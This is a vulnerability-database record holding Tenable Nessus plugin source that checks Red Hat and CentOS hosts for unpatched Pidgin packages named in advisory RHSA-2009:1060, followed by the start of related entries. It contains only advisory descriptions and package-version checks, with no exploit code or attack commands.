{"id": "REDHAT-RHSA-2009-1060.NASL", "bulletinFamily": "scanner", "title": "RHEL 4 / 5 : pidgin (RHSA-2009:1060)", "description": "Updated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.", "published": "2009-05-23T00:00:00", "modified": "2009-05-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/38872", "reporter": "This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/cve-2009-1374", "https://access.redhat.com/errata/RHSA-2009:1060", "https://access.redhat.com/security/cve/cve-2009-1373", "https://access.redhat.com/security/cve/cve-2009-1375", "https://access.redhat.com/security/cve/cve-2009-1376"], "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373", "CVE-2009-2694"], "type": "nessus", "lastseen": "2021-01-17T13:06:45", "edition": 28, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["PIDGIN_2_5_6.NASL", "FEDORA_2009-5552.NASL", "SLACKWARE_SSA_2009-146-01.NASL", "GENTOO_GLSA-200905-07.NASL", "ORACLELINUX_ELSA-2009-1060.NASL", "CENTOS_RHSA-2009-1060.NASL", "FEDORA_2009-5597.NASL", "MANDRIVA_MDVSA-2009-147.NASL", "DEBIAN_DSA-1805.NASL", "FEDORA_2009-5583.NASL"]}, {"type": "gentoo", "idList": ["GLSA-200905-07"]}, {"type": "fedora", "idList": ["FEDORA:AD43210F80A", "FEDORA:A53CF10F80A", "FEDORA:F0DBC10F8A0"]}, {"type": "openvas", "idList": ["OPENVAS:64266", "OPENVAS:64516", "OPENVAS:136141256231064020", "OPENVAS:136141256231064106", "OPENVAS:136141256231064343", "OPENVAS:136141256231064266", "OPENVAS:136141256231064052", "OPENVAS:136141256231064101", "OPENVAS:136141256231064516", "OPENVAS:1361412562310880708"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21869", "SECURITYVULNS:VULN:9114", "SECURITYVULNS:VULN:9250", "SECURITYVULNS:DOC:21887", "SECURITYVULNS:DOC:22344"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1870-1:14B64", "DEBIAN:DSA-1805-1:A94A0", "DEBIAN:7CBCBF8C24D8988DB95B28F0FFCF75C8:F574C"]}, {"type": "freebsd", "idList": ["B1CA65E6-5AAF-11DE-BC9B-0030843D3802"]}, {"type": "slackware", "idList": ["SSA-2009-146-01"]}, {"type": "redhat", "idList": ["RHSA-2009:1059", "RHSA-2009:1060"]}, {"type": "centos", "idList": ["CESA-2009:1059", "CESA-2009:1060"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1059", "ELSA-2009-1060"]}, {"type": "ubuntu", "idList": ["USN-781-2", "USN-781-1"]}, {"type": "seebug", "idList": ["SSV:11415"]}, {"type": "cve", "idList": ["CVE-2009-1375", "CVE-2009-2694", "CVE-2008-2927", "CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1376"]}, {"type": "exploitdb", "idList": ["EDB-ID:9615"]}], "modified": "2021-01-17T13:06:45", "rev": 2}, "score": {"value": 8.4, "vector": "NONE", "modified": "2021-01-17T13:06:45", "rev": 2}, "vulnersScore": 8.4}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1060. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38872);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2927\", \"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2009-2694\");\n script_bugtraq_id(35067);\n script_xref(name:\"RHSA\", value:\"2009:1060\");\n\n script_name(english:\"RHEL 4 / 5 : pidgin (RHSA-2009:1060)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1373\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1374\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1060\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"finch-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"finch-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"finch-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"finch-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-perl-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-perl-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-tcl-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-perl-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-perl-2.5.5-2.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"finch-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"finch-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"finch-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"finch-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-perl-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-perl-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-tcl-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-perl-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-perl-2.5.5-3.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "38872", "cpe": ["p-cpe:/a:redhat:enterprise_linux:pidgin-perl", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:libpurple", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:libpurple-perl", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:pidgin-devel", "p-cpe:/a:redhat:enterprise_linux:pidgin", "p-cpe:/a:redhat:enterprise_linux:finch-devel", "p-cpe:/a:redhat:enterprise_linux:libpurple-devel", "p-cpe:/a:redhat:enterprise_linux:finch", "p-cpe:/a:redhat:enterprise_linux:libpurple-tcl"], "scheme": null}

{"nessus": [{"lastseen": "2021-01-06T09:25:44", "description": "Updated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.", "edition": 28, "published": "2010-01-06T00:00:00", "title": "CentOS 4 / 5 : pidgin (CESA-2009:1060)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373", "CVE-2009-2694"], "modified": "2010-01-06T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libpurple-tcl", "p-cpe:/a:centos:centos:pidgin-perl", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:finch-devel", "p-cpe:/a:centos:centos:libpurple-devel", "p-cpe:/a:centos:centos:libpurple", "p-cpe:/a:centos:centos:pidgin", "p-cpe:/a:centos:centos:finch", "p-cpe:/a:centos:centos:pidgin-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:libpurple-perl"], "id": "CENTOS_RHSA-2009-1060.NASL", "href": "https://www.tenable.com/plugins/nessus/43751", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1060 and \n# CentOS Errata and Security Advisory 2009:1060 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43751);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-2927\", \"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2009-2694\");\n script_bugtraq_id(35067);\n script_xref(name:\"RHSA\", value:\"2009:1060\");\n\n script_name(english:\"CentOS 4 / 5 : pidgin (CESA-2009:1060)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-May/015891.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f0ad1a5\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-May/015892.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7b25971e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-May/015937.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8266309b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"finch-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"finch-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-perl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-tcl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"pidgin-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"pidgin-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"pidgin-perl-2.5.5-2.el4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-perl-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-tcl-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-perl-2.5.5-3.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:44:32", "description": "From Red Hat Security Advisory 2009:1060 :\n\nUpdated pidgin packages that fix several security 